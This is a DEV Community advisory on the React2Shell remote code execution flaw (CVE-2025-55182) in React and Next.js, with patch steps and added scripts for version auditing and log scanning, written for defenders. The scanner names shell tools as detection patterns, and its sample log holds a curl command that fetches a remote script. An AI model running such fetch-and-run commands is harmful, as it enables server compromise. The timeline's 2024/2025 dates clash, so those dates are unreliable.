DEV Community

sizan mahmud0
Critical Security Vulnerability in Next.js & React: CVE-2025-55182 (React2Shell)

Overview: A Maximum Severity Threat

A critical remote code execution vulnerability has been discovered in React Server Components and Next.js, earning the highest possible severity rating of CVSS 10.0. Known as "React2Shell," this flaw allows attackers to execute arbitrary code on your server without any authentication. With exploitation already observed in the wild and near-100% reliability, immediate action is required.

What Makes This Vulnerability So Dangerous?

CVE-2025-55182: The Core React Vulnerability

The vulnerability affects React Server Components (RSC) in React 19, specifically how the "Flight" protocol handles server-side requests. The issue stems from unsafe deserialization of payloads sent to React Server Function endpoints.

Key Facts:

  • CVSS Score: 10.0 (Maximum Severity)
  • Authentication Required: None
  • Attack Complexity: Low
  • Exploit Reliability: Near 100% success rate
  • Public Exploits: Available
  • Active Exploitation: Confirmed in the wild

CVE-2025-66478: The Next.js Impact

This CVE tracks the downstream impact on Next.js applications: because Next.js builds on React Server Components, applications that use the App Router are directly affected.

Who Is Affected?

Vulnerable React Versions:

  • React 19.0.0
  • React 19.1.0
  • React 19.1.1
  • React 19.2.0

Affected Packages:

  • react-server
  • react-server-dom-webpack
  • react-server-dom-turbopack
  • react-server-dom-parcel

Vulnerable Next.js Versions:

  • Next.js 15.x (all versions before patched releases)
  • Next.js 16.x (all versions before patched releases)
  • Next.js 14.3.0-canary.77 and later canary releases

Not Affected:

  • Next.js 13.x
  • Next.js 14.x stable releases
  • Applications using only Pages Router
  • Applications on Edge Runtime
  • Apps without React Server Components

Other Affected Frameworks:

  • React Router
  • Waku
  • RedwoodJS (RedwoodSDK)
  • Expo
  • Vite (with RSC plugin)
  • Parcel (with RSC plugin)

The Scale of the Problem

According to security researchers:

  • 39% of cloud environments contain vulnerable instances
  • 968,000+ React and Next.js instances detected on public internet
  • 10 million+ active websites globally use these frameworks
  • 44% of all cloud environments have publicly exposed Next.js instances

Major platforms built with React include Instagram, Netflix, Airbnb, and thousands of enterprise applications.

How the Attack Works

The vulnerability allows attackers to:

  1. Craft malicious HTTP requests to any Server Function endpoint
  2. Exploit unsafe deserialization in the RSC Flight protocol
  3. Execute arbitrary JavaScript code on the server with full privileges
  4. Achieve remote code execution without authentication

The attack requires only network access and works against default configurations with no special setup needed.

Observed Attacks in the Wild

Security researchers have documented active exploitation including:

  • Initial Access Broker (IAB) activity with suspected ties to state-sponsored actors
  • Fileless shell script execution via curl or wget
  • Installation of SNOWLIGHT and VShell Trojans
  • DNS queries to OAST platforms (*.oast.live, *.oastify.com)
  • Anomalous processes spawned from Next.js containers

Immediate Action Required: How to Protect Your Site

Step 1: Update to Patched Versions

For React:

Update to the fixed version for your release line:

  • React 19.0.1
  • React 19.1.2
  • React 19.2.1
npm install react@19.2.1 react-dom@19.2.1

For Next.js:

Use the automated fix tool:

npx fix-react2shell-next

Or manually update to patched versions:

# For Next.js 15.0.x
npm install next@15.0.5

# For Next.js 15.1.x
npm install next@15.1.9

# For Next.js 15.2.x
npm install next@15.2.6

# For Next.js 15.3.x
npm install next@15.3.6

# For Next.js 15.4.x
npm install next@15.4.8

# For Next.js 15.5.x
npm install next@15.5.7

# For Next.js 16.0.x
npm install next@16.0.7

For Next.js 14 Canary Users:

Downgrade to stable version:

npm install next@14

Step 2: Verify Your Updates

After updating, verify the installation:

npm list react react-dom next

Ensure all packages show the patched versions.

Step 3: Rebuild and Redeploy

# Clear build cache
rm -rf .next

# Rebuild your application
npm run build

# Redeploy immediately
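To automate the Step 2 check, here is an added example that is not code from the original post or from the React / Next.js projects. It takes the JSON tree that `npm list react react-dom next --json` produces and classifies every react, react-dom and next copy it finds, nested copies pulled in by other packages included, against the version lists given above. The status labels, the `review` outcome for version lines the post does not enumerate, and the sample tree are assumptions of this example.

```javascript
// Added example, not code from the original post or from the React / Next.js
// projects. It classifies the versions that `npm list react react-dom next --json`
// reports against the fix list in the post. Status labels, the handling of
// version lines the post does not enumerate ('review'), and the sample tree
// are assumptions of this example.

// Patched React release per 19.x line (from the post).
const REACT_PATCHED = { '19.0': '19.0.1', '19.1': '19.1.2', '19.2': '19.2.1' };
// Patched Next.js release per minor line (from the post).
const NEXT_PATCHED = {
  '15.0': '15.0.5', '15.1': '15.1.9', '15.2': '15.2.6', '15.3': '15.3.6',
  '15.4': '15.4.8', '15.5': '15.5.7', '16.0': '16.0.7',
};

// Splits "MAJOR.MINOR.PATCH[-prerelease]" into its parts; null if unparseable.
function parseSemver(version) {
  const m = /^(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.-]+))?/.exec(version);
  return m ? { major: +m[1], minor: +m[2], patch: +m[3], pre: m[4] || null } : null;
}

// Compares the numeric triple only (prerelease tags are handled by the callers).
function compareCore(a, b) {
  return (a.major - b.major) || (a.minor - b.minor) || (a.patch - b.patch);
}

function statusAgainst(v, fixed) {
  return compareCore(v, parseSemver(fixed)) < 0 ? 'vulnerable' : 'patched';
}

// 'vulnerable' | 'patched' | 'unaffected' | 'review' (line not covered by the post).
function reactStatus(version) {
  const v = parseSemver(version);
  if (!v) return 'review';
  if (v.major < 19) return 'unaffected';   // the post lists only React 19 releases
  if (v.major > 19 || v.pre) return 'review';
  const fixed = REACT_PATCHED[`${v.major}.${v.minor}`];
  return fixed ? statusAgainst(v, fixed) : 'review';
}

function nextStatus(version) {
  const v = parseSemver(version);
  if (!v) return 'review';
  if (v.major <= 13) return 'unaffected';
  if (v.major === 14) {
    if (!v.pre) return 'unaffected';       // 14.x stable is not affected
    const canary = /^canary\.(\d+)$/.exec(v.pre);
    if (!canary) return 'review';
    const rel = compareCore(v, { major: 14, minor: 3, patch: 0 });
    // 14.3.0-canary.77 and every later canary is vulnerable; earlier canaries are not enumerated.
    return rel > 0 || (rel === 0 && +canary[1] >= 77) ? 'vulnerable' : 'review';
  }
  if (v.major === 15 || v.major === 16) {
    if (v.pre) return 'review';            // 15.x / 16.x canaries are not enumerated
    const fixed = NEXT_PATCHED[`${v.major}.${v.minor}`];
    return fixed ? statusAgainst(v, fixed) : 'review';
  }
  return 'review';
}

// Walks an `npm list --json` tree and reports every react / react-dom / next
// node, including copies nested under other packages.
function auditTree(tree, path = [], findings = []) {
  for (const [name, info] of Object.entries(tree.dependencies || {})) {
    const here = [...path, name];
    let status = null;
    if (name === 'react' || name === 'react-dom') status = reactStatus(info.version);
    else if (name === 'next') status = nextStatus(info.version);
    if (status) findings.push({ package: here.join(' > '), version: info.version, status });
    auditTree(info, here, findings);
  }
  return findings;
}

function hasVulnerable(findings) {
  return findings.some((f) => f.status === 'vulnerable');
}

// Constructed sample of `npm list --json` output: the top-level packages are
// patched, but a UI library still pulls in its own vulnerable copy of react.
const SAMPLE_NPM_LS = {
  name: 'example-app',
  version: '1.0.0',
  dependencies: {
    react: { version: '19.2.1' },
    'react-dom': { version: '19.2.1' },
    next: { version: '15.5.7' },
    'some-ui-kit': { version: '2.0.0', dependencies: { react: { version: '19.1.1' } } },
  },
};

if (typeof require !== 'undefined' && require.main === module) {
  // To audit a real tree, replace SAMPLE_NPM_LS with JSON.parse(require('fs').readFileSync(0, 'utf8'))
  // and pipe `npm list react react-dom next --json` into the script.
  const report = auditTree(SAMPLE_NPM_LS);
  for (const f of report) console.log(`${f.status.padEnd(10)} ${f.package}@${f.version}`);
  console.log(hasVulnerable(report) ? 'ACTION REQUIRED: vulnerable copies found' : 'OK: no vulnerable copies found');
}
```

The nested copy in the sample is the case a plain `npm install react@19.2.1` does not fix: a dependency that pins its own react must be updated or overridden separately, which is why the walk recurses instead of stopping at the top level. Anything reported as `review` (a version line the post does not list, or a 15.x / 16.x canary) needs a manual check against the official advisory rather than being treated as safe.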

Additional Security Measures

1. Enable Web Application Firewall (WAF)

If you're hosted on major platforms, WAF rules have been deployed:

  • Vercel: Automatic protection for all projects (still update!)
  • Cloudflare: New WAF rules deployed
  • Google Cloud: WAF rules available
  • AWS WAF: Check for available rule updates

Important: WAF protection is temporary. You must still update your dependencies.

2. Monitor for Suspicious Activity

Watch for these indicators of compromise:

  • Unusual DNS queries to OAST platforms
  • Unexpected processes spawned by Node.js/Next.js
  • Anomalous outbound network connections
  • Suspicious HTTP requests to Server Function endpoints
  • New user accounts or elevated privileges

3. Implement Runtime Monitoring

Set up alerts for:

  • Container escapes
  • Privilege escalation attempts
  • Unexpected file system modifications
  • Malicious shell script execution
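As an added example that is not from the original post, here is a small Node.js script that applies the indicators from sections 2 and 3 to log lines: DNS queries to the OAST domains named above, and shell tools spawned by the Node.js process. The key=value log format, the sample lines and the list of suspicious child processes are constructed assumptions; adapt the parser to what your resolver and process-audit daemon actually emit.

```javascript
// Added example (not from the original post): scans DNS query logs and
// process-execution logs for the indicators of compromise listed in the post.
// The key=value log format, the sample lines and the process baselines below
// are constructed assumptions for illustration.

// OAST callback domains named in the post.
const OAST_SUFFIXES = ['.oast.live', '.oastify.com'];
// Assumed baseline: a Next.js server process should not be spawning these.
const SUSPICIOUS_CHILDREN = new Set(['curl', 'wget', 'sh', 'bash', 'nc']);
const NODE_PARENTS = new Set(['node', 'next-server']);

// Parses key=value pairs; values may be double-quoted to allow spaces.
function parseKv(line) {
  const out = {};
  const re = /(\w+)=("([^"]*)"|\S+)/g;
  let m;
  while ((m = re.exec(line)) !== null) out[m[1]] = m[3] !== undefined ? m[3] : m[2];
  return out;
}

function isOastDomain(qname) {
  const name = qname.toLowerCase().replace(/\.$/, '');
  return OAST_SUFFIXES.some((suffix) => name.endsWith(suffix));
}

// Executable name without its directory, e.g. "/usr/bin/curl -s ..." -> "curl".
function baseName(cmd) {
  const exe = cmd.trim().split(/\s+/)[0] || '';
  return exe.slice(exe.lastIndexOf('/') + 1);
}

// Returns a finding for one log line, or null if no rule matched.
function inspectLine(line) {
  const kv = parseKv(line);
  if (kv.event === 'dns' && kv.qname && isOastDomain(kv.qname)) {
    return { rule: 'oast-dns-callback', source: kv.client, detail: kv.qname };
  }
  if (kv.event === 'exec' && kv.parent && kv.cmd) {
    if (NODE_PARENTS.has(kv.parent) && SUSPICIOUS_CHILDREN.has(baseName(kv.cmd))) {
      return { rule: 'node-spawned-shell-tool', source: kv.host, detail: `${kv.parent} -> ${kv.cmd}` };
    }
  }
  return null;
}

function scanLog(lines) {
  return lines.map(inspectLine).filter(Boolean);
}

// Constructed sample log (not real telemetry): a benign DNS query, an OAST
// callback, a normal child process, and curl spawned by the node process.
const SAMPLE_LOG = [
  'ts=2025-12-08T10:15:01Z event=dns client=10.0.3.14 qname=api.example.com type=A',
  'ts=2025-12-08T10:15:02Z event=dns client=10.0.3.14 qname=k3j9x.oastify.com type=A',
  'ts=2025-12-08T10:15:03Z event=exec host=web-1 parent=node pid=4401 cmd="/usr/bin/node worker.js"',
  'ts=2025-12-08T10:15:04Z event=exec host=web-1 parent=node pid=4402 cmd="/usr/bin/curl -s http://198.51.100.7/s.sh"',
];

for (const finding of scanLog(SAMPLE_LOG)) {
  console.log(`[${finding.rule}] source=${finding.source} ${finding.detail}`);
}
```

Both rules are deliberately narrow so they can run on every line without tuning: the DNS rule only fires on the two callback domains the post names, and the process rule only fires when the parent is the Node.js server itself, so a build container running `curl` under a shell does not trigger it. A hit on either rule on a host that serves an unpatched App Router application should be treated as a possible compromise and handed to incident response, not just patched over.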

4. Network Segmentation

If immediate patching isn't possible:

  • Restrict network access to affected applications
  • Implement strict firewall rules
  • Use network segmentation to limit blast radius
  • Enable enhanced logging on Server Function endpoints

5. Audit Your Dependencies

Check all dependencies that might bundle vulnerable React versions:

npm audit
npm list react-server

Prevention and Long-Term Security

1. Implement Automated Dependency Scanning

Use tools like:

  • Dependabot (GitHub)
  • Snyk
  • Trivy
  • npm audit

Configure automatic pull requests for security updates.

2. Create Security Policies

Implement CI/CD policies to:

  • Block deployments with known vulnerabilities
  • Require security reviews for dependency updates
  • Scan container images before deployment
  • Monitor SBOM (Software Bill of Materials)

3. Regular Security Audits

Schedule regular audits of:

  • Application dependencies
  • Server configurations
  • Access controls
  • Network policies

4. Stay Informed

Subscribe to security advisories:

5. Follow Security Best Practices

  • Keep all dependencies up to date
  • Use package lock files
  • Implement least privilege access
  • Enable security headers
  • Use Content Security Policy (CSP)
  • Implement rate limiting
  • Enable HTTPS everywhere

Verification Checklist

Use this checklist to ensure your site is protected:

  • [ ] Updated React to 19.0.1, 19.1.2, or 19.2.1
  • [ ] Updated Next.js to patched version for your release line
  • [ ] Verified updates with npm list
  • [ ] Cleared build cache and rebuilt application
  • [ ] Redeployed to production
  • [ ] Verified WAF rules are active (if applicable)
  • [ ] Enabled security monitoring
  • [ ] Reviewed logs for suspicious activity
  • [ ] Updated all other affected frameworks
  • [ ] Documented the update in your security log
  • [ ] Notified relevant team members
  • [ ] Scheduled follow-up security audit

Why This Matters for Your Business

A successful exploitation could result in:

  • Data Breaches: Access to sensitive customer data
  • Service Disruption: Complete server compromise
  • Reputational Damage: Loss of customer trust
  • Financial Loss: Regulatory fines, incident response costs
  • Legal Liability: Lawsuits and compliance violations
  • Intellectual Property Theft: Access to proprietary code and data

Timeline of the Vulnerability

  • November 29, 2024: Lachlan Davidson reported the flaw to Meta
  • November 30, 2024: Meta confirmed the issue
  • December 3, 2025: Public disclosure and patches released
  • December 4, 2025: Active exploitation observed in the wild
  • December 6, 2025: Automated fix tool released
  • December 8, 2025: Widespread exploitation campaigns detected

Frequently Asked Questions

Q: Am I affected if I use Next.js Pages Router?
A: No, only App Router applications are affected.

Q: Do I need to change my code after updating?
A: No, the patches are drop-in replacements requiring no code changes.

Q: Is WAF protection sufficient?
A: No, WAF rules are a temporary measure. You must update your dependencies.

Q: How can I test if my site is vulnerable?
A: Do not test in production. Update immediately instead. Security researchers have tools for controlled testing environments.

Q: What if I can't update immediately?
A: Deploy WAF rules, restrict network access, enhance monitoring, and prioritize the update as your top priority.

Resources and References

Conclusion

CVE-2025-55182 (React2Shell) represents one of the most critical vulnerabilities in the React ecosystem. With a maximum severity rating, active exploitation in the wild, and the potential for devastating impact, updating your applications is not optional: it's an emergency.

Take action now:

  1. Run npx fix-react2shell-next
  2. Verify your updates
  3. Redeploy immediately
  4. Monitor for suspicious activity

Don't wait. Every minute your application remains unpatched increases the risk of compromise. The security of your users, your data, and your business depends on immediate action.


Last Updated: December 9, 2025

Disclaimer: This blog post is for informational purposes only. Always refer to official security advisories and consult with your security team for guidance specific to your environment.

Top comments (5)

Nodirbek Ergashev

You are a life saver

sizan mahmud0

Thank you for your comment

Roger Wilco

Unsafe deserialization? Was it written by vibecoders?

sizan mahmud0

Link-1
Link-2
Link-3

I read so many blogs before writing about this topic. I used the "unsafe deserialization" keyword. Anyone can understand what I mean. A few bloggers used this keyword. If I made any mistake, please tell me. I really appreciate your comment and am ready to correct myself.

Roger Wilco

No, it's okay with your term. I mean the folks who did it inside the React code.